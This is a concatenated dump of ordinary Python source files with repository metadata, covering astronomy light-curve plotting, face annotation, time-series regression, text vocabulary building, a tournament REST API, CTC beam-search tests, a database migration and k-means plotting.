fig.subplots_adjust(bottom=0.15, top=0.88, hspace=0.3, left=0.12, right=0.98, wspace=0)
fig.suptitle('%s' % title, fontsize=12, fontweight='bold')
else:
if len(labels) > 0:
fig.subplots_adjust(bottom=0.15, top=0.88, hspace=0.3, left=0.12, right=0.98, wspace=0)
else:
fig.subplots_adjust(bottom=0.15, top=0.95, hspace=0.3, left=0.12, right=0.98, wspace=0)
ax = fig.add_subplot(111, facecolor='#FFFFEC')
nsymbols = len(symbols)
nlabels = len(labels)
# Iterate over the 'datasets' tuple:
for item, dataset in enumerate(datasets):
# assert(type(dataset) is ndarray)
if dataset.shape[0] < 1: # check if dataset is empty
continue
ncols = dataset.shape[1]
assert ncols > 1 # check if there are at least 2 columns
phase = dataset[:, 0]
mag = dataset[:, 1]
if ncols > 2:
magerr = dataset[:, 2]
else:
magerr = None
if nsymbols > item:
symbol = symbols[item]
color = None
else:
symbol = 'o'
color = next(ax._get_lines.prop_cycler)['color']
if nlabels > item:
label = labels[item]
else:
label = None
if item in fillerr_index:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
base, = ax.plot(phase, mag, symbol, label=label, color=color, zorder=48)
# Shade the 95% credible interval around the optimal solution.
ax.fill(np.concatenate([phase.ravel(), phase.ravel()[::-1]]),
np.concatenate([mag.ravel() - 1.9600 * magerr,
(mag.ravel() + 1.9600 * magerr)[::-1]]),
alpha=.4, fc=base.get_color(), ec='None', zorder=70)
else:
ax.errorbar(phase, mag, yerr=magerr, fmt=symbol, label=label, capsize=capsize, color=color)
if maxphase > 1:
ax.errorbar(phase + 1, mag, yerr=magerr, fmt=symbol, capsize=capsize, color=color)
if nlabels > 0:
plt.legend(fontsize=8, loc='upper center', bbox_to_anchor=(0.5, 1.20),
ncol=4, fancybox=True, shadow=False)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
if len(figtext) > 0:
ax.text(0.05, 1.02, "%s" % figtext, ha='left', va='top', bbox=dict(boxstyle='round', ec='k', fc='w'),
transform=ax.transAxes)
plt.xlim(minphase, maxphase)
if constrain_yaxis_range:
# The y axis range will be will be optimized for the range datasets[0][1].
# print(datasets[1][1])
minmag = np.min(datasets[1][:, 1])
maxmag = np.max(datasets[1][:, 1])
magrange = maxmag - minmag
ax.set_ylim(minmag - magrange / 5., maxmag + magrange / 5.)
if invert_y_axis:
plt.gca().invert_yaxis()
# plt.tight_layout()
if figsave and (outfile is not None):
fig.savefig(outfile, format=figformat)
plt.close(fig)
else:
fig.show()
return None
def extend_phases(p, y, phase_ext_neg=0.0, phase_ext_pos=0.0, sort=False):
"""
Extend a phase and a corresponding data vector in phase.
"""
# Extend data vectors in phase:
neg_ext_mask = (p - 1 > phase_ext_neg) # select phases in negative direction
pos_ext_mask = (p + 1 < phase_ext_pos) # select phases in positive direction
# Compose new data vectors according to extended phases:
p_ext = np.hstack((p[neg_ext_mask] - 1, p, p[pos_ext_mask] + 1))
y_ext = np.hstack((y[neg_ext_mask], y, y[pos_ext_mask]))
# magerr_ext=np.hstack((results['magerr_binned'][neg_ext_mask], results['magerr_binned'],
# results['magerr_binned'][pos_ext_mask]))
if sort:
# Sort data according to observed phases:
indx = np.argsort(p_ext) # indices of sorted ophase
p_ext_sorted = p_ext[indx]
y_ext_sorted = y_ext[indx]
return p_ext_sorted, y_ext_sorted
else:
return p_ext, y_ext
def smolec_feh(period, phi31, amp2):
return -6.125 - 4.795 * period + 1.181 * phi31 + 7.876 * amp2
| 42.517375
| 133
| 0.582047
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,534
| 0.251271
|
9ff65d9e76edd0a7d15ce5ca32d68a653fd8c1bc
| 2,939
|
py
|
Python
|
facetool/annotator.py
|
yliess86/FaceTool
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 4
|
2020-05-03T01:29:23.000Z
|
2020-07-15T08:13:05.000Z
|
facetool/annotator.py
|
yliess86/FaceTool
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 3
|
2020-04-30T01:18:02.000Z
|
2020-05-01T14:52:11.000Z
|
facetool/annotator.py
|
yliess86/FaceCrop
|
f93c511e9868b4555225750efbac2228a00fea00
|
[
"MIT"
] | 1
|
2020-05-16T21:27:24.000Z
|
2020-05-16T21:27:24.000Z
|
# -*- coding: utf-8 -*-
"""facetool.annotator
The files provides a Face Annotator in charge of combining the result of the
Face Detector and Face Landmark in a single pandas DataFrame. This Face
Annotator is the API built to be used by the end user.
"""
from facetool.detector import FaceDetector
from facetool.landmarker import FaceLandmarker
from tqdm import tqdm
from typing import Tuple
import numpy as np
import pandas as pd
class FaceAnnotator:
"""Face Annotator
Face Annotator combine the boxes of a Face Detector and the landmarks of a
Face Landmarker in a single DataFrame that can later be used for analysis,
further computation, or visualization.
Arguments:
dbatch_size {int} -- batch size for the detector inference
lbatch_size {int} -- batch size for the landmarker frame loading
size {Tuple[int, int]} -- resize frames for detector
n_process {int} -- number of threads used by the landmarker
device {str} -- device to run the detector on ("cpu" or "cuda")
"""
def __init__(
self, dbatch_size: int, lbatch_size: int, size: Tuple[int, int],
n_process: int, device: str,
) -> None:
self.detector = FaceDetector(device, dbatch_size, size)
self.landmarker = FaceLandmarker(n_process, lbatch_size)
def __call__(self, path: str) -> pd.DataFrame:
"""Call
Combines boxes and landmarks in a single DataFrame.
Arguments:
path {str} -- path to the video to be annotated
Returns:
pd.DataFrame -- dataframe containing boxes and landmarks
informations of size [N, 1 + 4 + 68 * 2] where:
* N -> valid frames (frame with face detected)
* 1 -> frame_idx
* 4 -> box_x, box_y, box_w, box_h
* 68 * 2 -> landmark_i_x, landmark_i_y for i in range(68)
"""
boxes = self.detector(path)
landmarks = self.landmarker(path, boxes)
N, B = boxes.shape # Frames x Boxe Data
N, L, P = landmarks.shape # Frames x Landmark x Coords
# Combine Data
data = np.zeros((N, B + L * P), dtype=int)
pbar = tqdm(enumerate(zip(boxes, landmarks)), desc="Face Annotator")
for i, (box, landmark) in pbar:
data[i, 0:(4 + 1)] = box # t, x, y, w, h -> 5
data[i, 5::2] = landmark[:, 0] # x_0 .... x_68 -> 68
data[i, 6::2] = landmark[:, 1] # y_0 .... y_68 -> 68
# Helpers to Name Landmarks Columns
lpos = lambda k: "x" if k == 0 else "y"
lname = lambda j, k: f"landmark_{j + 1}_{lpos(k)}"
# Landmarks Column Names
names = ["frame_idx", "box_x", "box_y", "box_w", "box_h"]
names += [lname(j, k) for j in range(L) for k in range(P)]
# Create DataFrame
df = pd.DataFrame(data=data, columns=names)
return df
| 36.7375
| 78
| 0.600204
| 2,504
| 0.85199
| 0
| 0
| 0
| 0
| 0
| 0
| 1,681
| 0.571963
|
9ff7ddf37d375ebc0e9b1af36cfd6f7f85ab8e18
| 1,338
|
py
|
Python
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 7
|
2018-07-18T16:08:51.000Z
|
2020-12-09T07:18:35.000Z
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 3
|
2018-04-13T11:44:59.000Z
|
2018-04-19T13:58:06.000Z
|
pygrn/problems/air_quality.py
|
nico1as/pyGRN
|
115d9d42dfbd374fc64393cabefb2a8e245aa6b7
|
[
"Apache-2.0"
] | 6
|
2018-07-22T01:54:14.000Z
|
2021-08-04T16:01:38.000Z
|
from __future__ import print_function
import numpy as np
import os
from datetime import datetime
from pygrn.problems import TimeRegression
class AirQuality(TimeRegression):
def __init__(self, namestr=datetime.now().isoformat(), learn=True,
epochs=1, root_dir='./', lamarckian=False):
data_file = os.path.join(root_dir, 'data/normalized_air_quality.csv')
all_dat = np.genfromtxt(data_file, delimiter=',')
winsize = 5
data = all_dat[:, 1:]
labels = all_dat[winsize:, 0]
windowed = data[:-winsize, :]
for i in range(1, winsize):
windowed = np.concatenate((windowed, data[i:-(winsize-i), :]),
axis=1)
num_train = int(3*np.floor(windowed.shape[0]/4))
self.x_train = windowed[:num_train, :]
self.x_test = windowed[num_train:, :]
self.y_train = labels[:num_train]
self.y_test = labels[num_train:]
self.batch_size = 30
self.epochs = epochs
self.learn = learn
self.generation = 0
self.error = 0.1
self.error_decrease = 0.9
self.lamarckian = lamarckian
self.nin = data.shape[1]
self.nout = 1
self.cacheable = False
self.logfile = os.path.join(root_dir, 'logs/air_' + namestr + '.log')
| 31.857143
| 77
| 0.595665
| 1,196
| 0.893871
| 0
| 0
| 0
| 0
| 0
| 0
| 57
| 0.042601
|
9ff867269ebc563da12e37b56fdbdcb6807b0b80
| 3,572
|
py
|
Python
|
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | 11
|
2020-02-07T05:26:08.000Z
|
2021-11-27T09:51:24.000Z
|
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | null | null | null |
vocabulary.py
|
retrieva/python_stm
|
862e63e6f03b326cb036b1136dead280c42b9da8
|
[
"MIT"
] | 1
|
2020-02-10T02:44:37.000Z
|
2020-02-10T02:44:37.000Z
|
# This code is available under the MIT License.
# (c)2010-2011 Nakatani Shuyo / Cybozu Labs Inc.
# (c)2018-2019 Hiroki Iida / Retrieva Inc.
import nltk
import re
import MeCab
stopwords_list = nltk.corpus.stopwords.words('english')
recover_list = {"wa":"was", "ha":"has"}
wl = nltk.WordNetLemmatizer()
def load_corpus(ranges):
"""
load data from corpus
"""
tmp = re.match(r'(\d+):(\d+)$', ranges)
if tmp:
start = int(tmp.group(1))
end = int(tmp.group(2))
from nltk.corpus import brown as corpus
return [corpus.words(fileid) for fileid in corpus.fileids()[start:end]]
def load_dataframe(documents):
corpus = []
for doc in documents:
sentences = re.findall(r'\w+(?:\'\w+)?', doc)
if len(sentences) > 0:
corpus.append(sentences)
return corpus
def load_dataframe_jp(documents):
corpus = []
tagger = MeCab.Tagger('-O wakati')
tagger.parse("")
for doc in documents:
tokens = tagger.parse(doc.strip()).split()
corpus.append(tokens)
return corpus
def load_file(filename):
"""
for one file
one line corresponds to one doc
"""
corpus = []
f = open(filename, 'r')
for line in f:
doc = re.findall(r'\w+(?:\'\w+)?', line)
if len(doc) > 0:
corpus.append(doc)
f.close()
return corpus
def is_stopword(w):
return w in stopwords_list
def lemmatize(w0):
w = wl.lemmatize(w0.lower())
if w in recover_list: return recover_list[w]
return w
class Vocabulary:
def __init__(self, excluds_stopwords=False):
self.vocas = [] # id to word
self.vocas_id = dict() # word to id
self.docfreq = [] # id to document frequency
self.excluds_stopwords = excluds_stopwords
def term_to_id(self, term0):
term = lemmatize(term0)
if self.excluds_stopwords and is_stopword(term):
return None
if term not in self.vocas_id:
voca_id = len(self.vocas)
self.vocas_id[term] = voca_id
self.vocas.append(term)
self.docfreq.append(0)
else:
voca_id = self.vocas_id[term]
return voca_id
def doc_to_ids(self, doc):
ids_list = []
words = dict()
for term in doc:
id = self.term_to_id(term)
if id is not None:
ids_list.append(id)
if id not in words:
words[id] = 1
self.docfreq[id] += 1
if "close" in dir(doc):
doc.close()
return ids_list
def cut_low_freq(self, corpus, threshold=1):
new_vocas = []
new_docfreq = []
self.vocas_id = dict()
conv_map = dict()
for id, term in enumerate(self.vocas):
freq = self.docfreq[id]
if freq > threshold:
new_id = len(new_vocas)
self.vocas_id[term] = new_id
new_vocas.append(term)
new_docfreq.append(freq)
conv_map[id] = new_id
self.vocas = new_vocas
self.docfreq = new_docfreq
def conv(doc):
new_doc = []
for id in doc:
if id in conv_map: new_doc.append(conv_map[id])
return new_doc
return [conv(doc) for doc in corpus]
def __getitem__(self, v):
return self.vocas[v]
def size(self):
return len(self.vocas)
def is_stopword_id(self, id):
return self.vocas[id] in stopwords_list
| 26.072993
| 79
| 0.56075
| 2,028
| 0.567749
| 0
| 0
| 0
| 0
| 0
| 0
| 385
| 0.107783
|
9ffac072e4010a04d6f1b435f72c2103f99a9533
| 7,664
|
py
|
Python
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | 2
|
2015-05-03T13:42:27.000Z
|
2015-08-07T07:42:29.000Z
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | 2
|
2016-09-15T12:38:22.000Z
|
2016-09-15T12:41:18.000Z
|
kubb_match/views/rest.py
|
BartSaelen/kubb_match
|
848663bb3db5da73b726a956aa887c3eec30db8b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound
from pyramid.view import view_defaults, view_config
from kubb_match.data.mappers import map_team, map_game
from kubb_match.data.models import Team
from kubb_match.service.tournament_service import TournamentService
class RestView(object):
def __init__(self, request):
self.request = request
self.data_manager = request.data_managers['data_manager']
def _get_json_body(self):
try:
json_body = self.request.json_body
except AttributeError as e:
raise HTTPBadRequest(detail="Request bevat geen json body. \n%s" % e)
except ValueError as e:
raise HTTPBadRequest(detail="Request bevat incorrecte json body. \n%s" % e)
if 'id' in self.request.matchdict and 'id' not in json_body:
json_body['id'] = self.request.matchdict['id']
return json_body
@view_defaults(renderer='json', accept='application/json')
class TeamView(RestView):
@view_config(route_name='teams',
request_method='GET',
permission='view',
renderer='listjson')
def get_teams(self):
return self.data_manager.get_teams()
@view_config(route_name='team',
request_method='GET',
permission='view',
renderer='itemjson')
def get_team(self):
tid = self.request.matchdict['id']
t = self.data_manager.get_team(tid)
if not t:
return HTTPNotFound()
return t
def edit_team(self, t, json_body):
t = map_team(json_body, t)
t = self.data_manager.save(t)
return t
@view_config(
route_name='teams',
request_method='POST',
permission='admin',
renderer='itemjson'
)
def add_team(self):
team_data = self._get_json_body()
t = Team()
t = self.edit_team(t, team_data)
self.request.response.status = '201'
self.request.response.location = \
self.request.route_path('team', id=t.id)
return t
@view_config(
route_name='team',
request_method='PUT',
permission='admin',
renderer='itemjson'
)
def update_team(self):
tid = self.request.matchdict.get('id')
t = self.data_manager.get_team(tid)
if not t:
return HTTPNotFound()
team_data = self._get_json_body()
if 'id' in self.request.matchdict and 'id' not in team_data:
team_data['id'] = self.request.matchdict['id']
t = self.edit_team(t, team_data)
self.request.response.status = '200'
self.request.response.location = \
self.request.route_path('team', id=t.id)
return t
@view_defaults(renderer='json', accept='application/json')
class RoundView(RestView):
@view_config(route_name='rounds',
request_method='GET',
permission='view',
renderer='listjson')
def get_rounds(self):
return self.data_manager.get_rounds()
@view_config(route_name='round',
request_method='GET',
permission='view',
renderer='itemjson')
def get_round(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
return r
@view_config(route_name='round_games',
request_method='GET',
permission='view',
renderer='listjson')
def get_games(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
return r.games
@view_config(route_name='round_game',
request_method='GET',
permission='view',
renderer='itemjson')
def get_game(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
gid = self.request.matchdict['gid']
game = self.data_manager.get_game(gid)
return game
@view_config(route_name='round_game',
request_method='PUT',
permission='view',
renderer='itemjson')
def edit_game(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
if not r:
return HTTPNotFound()
gid = self.request.matchdict['gid']
game = self.data_manager.get_game(gid)
game_data = self._get_json_body()
if 'gid' in self.request.matchdict and 'gid' not in game_data:
game_data['gid'] = self.request.matchdict['gid']
game = map_game(game_data, game)
game = self.data_manager.save(game)
return game
@view_config(route_name='round_positions',
request_method='GET',
permission='view',
renderer='listjson')
def get_positions(self):
rid = self.request.matchdict['id']
r = self.data_manager.get_round(rid)
return r.positions
@view_defaults(renderer='json', accept='application/json')
class TournamentPhaseView(RestView):
def __init__(self, request):
super().__init__(request)
self.tournament_service = TournamentService(self.data_manager)
@view_config(route_name='phases',
request_method='GET',
permission='view',
renderer='listjson')
def get_phases(self):
return self.data_manager.get_phases()
@view_config(route_name='phase',
request_method='GET',
permission='view',
renderer='itemjson')
def get_phase(self):
pid = self.request.matchdict['id']
p = self.data_manager.get_phase(pid)
if not p:
return HTTPNotFound()
return p
@view_config(route_name='phase_status',
request_method='POST',
permission='view',
renderer='itemjson')
def tournament_phase_status(self):
data = self._get_json_body()
pid = self.request.matchdict['id']
if 'status' not in data:
return HTTPBadRequest('status should be present')
else:
status = data['status']
round = None
p = self.data_manager.get_phase(pid)
if status == 'init':
if not p:
return HTTPNotFound()
if p.type == 'battle':
round = self.tournament_service.init_battle_phase(p)
elif p.type == 'ko':
p1 = self.data_manager.get_phase(1)
lr = next((r for r in p1.rounds if not r.played))
round = self.tournament_service.init_ko_phase(p, lr.positions)
round = round['A']
elif status == 'next':
if p.type == 'battle':
round = self.tournament_service.next_battle_round(p)
elif p.type == 'ko':
round = self.tournament_service.next_ko_round(p)
round = round[0]
elif status == 'final':
if p.type == 'battle':
round = self.tournament_service.final_battle_round(p)
elif p.type == 'ko':
round = self.tournament_service.final_ko_round(p)
round = round[0]
else:
return HTTPBadRequest('invalid phase_type')
self.request.response.status = '201'
self.request.response.location = \
self.request.route_path('round', id=round.id)
| 34.678733
| 87
| 0.579201
| 7,172
| 0.935804
| 0
| 0
| 6,714
| 0.876044
| 0
| 0
| 840
| 0.109603
|
9ffb3711d6a34d1adba73090bd3c202a99a4f456
| 2,651
|
py
|
Python
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 488
|
2018-03-01T11:18:26.000Z
|
2022-03-10T09:29:32.000Z
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 60
|
2018-03-10T18:37:51.000Z
|
2022-03-30T19:37:18.000Z
|
CTCWordBeamSearch-master/tests/test_word_beam_search.py
|
brucegrapes/htr
|
9f8f07173ccc740dd8a4dfc7e8038abe36664756
|
[
"MIT"
] | 152
|
2018-03-01T11:18:25.000Z
|
2022-03-08T23:37:46.000Z
|
import codecs
import numpy as np
from word_beam_search import WordBeamSearch
def apply_word_beam_search(mat, corpus, chars, word_chars):
"""Decode using word beam search. Result is tuple, first entry is label string, second entry is char string."""
T, B, C = mat.shape
# decode using the "Words" mode of word beam search with beam width set to 25 and add-k smoothing to 0.0
assert len(chars) + 1 == C
wbs = WordBeamSearch(25, 'Words', 0.0, corpus.encode('utf8'), chars.encode('utf8'), word_chars.encode('utf8'))
label_str = wbs.compute(mat)
# result is string of labels terminated by blank
char_str = []
for curr_label_str in label_str:
s = ''
for label in curr_label_str:
s += chars[label] # map label to char
char_str.append(s)
return label_str[0], char_str[0]
def load_mat(fn):
"""Load matrix from csv and apply softmax."""
mat = np.genfromtxt(fn, delimiter=';')[:, :-1] # load matrix from file
T = mat.shape[0] # dim0=t, dim1=c
# apply softmax
res = np.zeros(mat.shape)
for t in range(T):
y = mat[t, :]
e = np.exp(y)
s = np.sum(e)
res[t, :] = e / s
# expand to TxBxC
return np.expand_dims(res, 1)
def test_mini_example():
"""Mini example, just to check that everything is working."""
corpus = 'a ba' # two words "a" and "ba", separated by whitespace
chars = 'ab ' # the first three characters which occur in the matrix (in this ordering)
word_chars = 'ab' # whitespace not included which serves as word-separating character
mat = np.array([[[0.9, 0.1, 0.0, 0.0]], [[0.0, 0.0, 0.0, 1.0]],
[[0.6, 0.4, 0.0, 0.0]]]) # 3 time-steps and 4 characters per time time ("a", "b", " ", blank)
res = apply_word_beam_search(mat, corpus, chars, word_chars)
print('')
print('Mini example:')
print('Label string:', res[0])
print('Char string:', '"' + res[1] + '"')
assert res[1] == 'ba'
def test_real_example():
"""Real example using a sample from a HTR dataset."""
data_path = '../data/bentham/'
corpus = codecs.open(data_path + 'corpus.txt', 'r', 'utf8').read()
chars = codecs.open(data_path + 'chars.txt', 'r', 'utf8').read()
word_chars = codecs.open(data_path + 'wordChars.txt', 'r', 'utf8').read()
mat = load_mat(data_path + 'mat_2.csv')
res = apply_word_beam_search(mat, corpus, chars, word_chars)
print('')
print('Real example:')
print('Label string:', res[0])
print('Char string:', '"' + res[1] + '"')
assert res[1] == 'submitt both mental and corporeal, is far beyond any idea'
| 35.346667
| 115
| 0.614485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,075
| 0.405507
|
9ffdc1e59bb26b37e4cdbdb001abd755fccd616d
| 859
|
py
|
Python
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 20
|
2020-02-29T19:03:31.000Z
|
2022-02-18T21:13:12.000Z
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 465
|
2020-02-29T19:08:18.000Z
|
2022-03-18T22:21:49.000Z
|
src/api/migrations/versions/2021-09-25_add_session_type_and_instructor.py
|
YACS-RCOS/yacs.n
|
a04f8e79279826914b942e3a8c709c50f08ff149
|
[
"MIT"
] | 19
|
2020-02-29T01:22:23.000Z
|
2022-02-14T01:47:09.000Z
|
"""add session type and instructor
Revision ID: 54df4fb8dfe9
Revises: a3be4710680d
Create Date: 2021-09-25 03:08:18.501929
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '54df4fb8dfe9'
down_revision = 'a3be4710680d'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('course_session', sa.Column('instructor', sa.VARCHAR(length=255), nullable=True))
op.add_column('course_session', sa.Column('session_type', sa.VARCHAR(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('course_session', 'session_type')
op.drop_column('course_session', 'instructor')
# ### end Alembic commands ###
| 27.709677
| 101
| 0.71362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 494
| 0.575087
|
9ffddf9f2ec970e9ca9b3a8192c022d87d76144d
| 1,656
|
py
|
Python
|
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
plot_data.py
|
qzane/kmeans-cuda
|
f2a0e8dd6859cf735c95e1365342f4623f0a71ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 27 22:31:17 2018
@author: qzane
"""
import numpy as np
import matplotlib.pyplot as plt
from argparse import ArgumentParser
def read_points(fname):
points = []
with open(fname) as f:
while(1):
tmp = f.readline()
if tmp == '':
break
if ',' in tmp:
f1,f2 = tmp.split(',')[:2]
f1,f2 = float(f1), float(f2)
points.append((f1,f2))
return np.array(points)
def read_classes(fname):
classes = []
with open(fname) as f:
while(1):
tmp = f.readline()
if tmp == '':
break
_class = int(tmp)
classes.append(_class)
return np.array(classes)
def plot(points, classes):
assert(points.shape[0]==classes.shape[0])
num_classes = classes.max()+1
cmap = plt.get_cmap('jet')
colors = [cmap(i) for i in np.linspace(0, 1, num_classes)]
for i in range(num_classes):
plt.plot(points[classes==i,0], points[classes==i,1], 'x', color=colors[i])
plt.show()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('-p', '--points', action='store', type=str, required=True,
help='points.txt')
parser.add_argument('-c', '--classes', action='store', type=str, required=True,
help='classes.txt')
args = parser.parse_args()
points = read_points(args.points)
classes = read_classes(args.classes)
plot(points, classes)
| 25.090909
| 83
| 0.532609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 200
| 0.120773
|